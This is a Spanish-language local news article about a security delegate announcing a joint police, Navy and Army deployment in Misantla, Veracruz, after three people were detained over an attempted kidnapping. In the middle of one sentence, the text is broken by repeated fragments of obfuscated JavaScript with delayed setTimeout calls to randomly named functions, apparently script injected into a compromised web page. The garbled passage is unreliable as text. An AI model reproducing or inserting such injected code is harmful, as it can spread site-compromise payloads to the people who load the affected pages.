Afirma policía de Vega de Alatorre que habrá blindaje en Misantla

Redacción. Misantla. Tras el operativo que se registrara en la ciudad de Vega de Alatorre, al ser detenidos y trasladados a esta ciudad tres personas presuntamente por actos indebidos, el delegado de la SSP con sede en la ciudad de Martínez indico que inicia el blindaje en Misantla.

Blindaje Misantla, inicia a partir de esta fecha, apunto quien dijo ser delegado de la SSP con sede en la ciudad de Martínez, al ser cuestionado sobre las acciones en conjunto con MARINA, SEDENA y Policías Municipales.

El mandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o regional apunto que esta mañana de martes se detectaron a tres personas que trataban de plagiar a una mujer en el municipio en mención, entre las 10 y 11 horas.

Dijo que en este operativo participaron dos vehículos de la MARINA, una de la Secretaria de Seguridad Publica y una unidad de la Policía Municipal de Vega de Alatorre, con un total de treinta elementos.

“Aquí se va a trabajar permanente con el ejército y MARINA; aquí en Misantla, hasta Chiconquiaco y Tenochtitlan, todo eso se va a recorrer durante la madrugada, tarde noche, depende como nos acomodemos”.

¿Esto se debió a la petición de las autoridades municipales?

“Así es,  es a petición”.

¿Estarán hasta Enero?

“Yo pienso que hasta enero o febrero, o no tenemos fechas hasta que se restablezca el orden”.

¿Para la denuncia ciudadana?

“Se va a poner unas mantas,  en las entradas y salidas, y con ustedes –prensa- que queremos que nos ayuden”.

Con esto la población misanteca, y la petición por parte de las autoridades municipales, hace que la confianza de los grupos policiacos y castrenses pueda tener la sociedad mas tranquilidad.

Deja un comentario

Tu dirección de correo electrónico no será publicada.

Close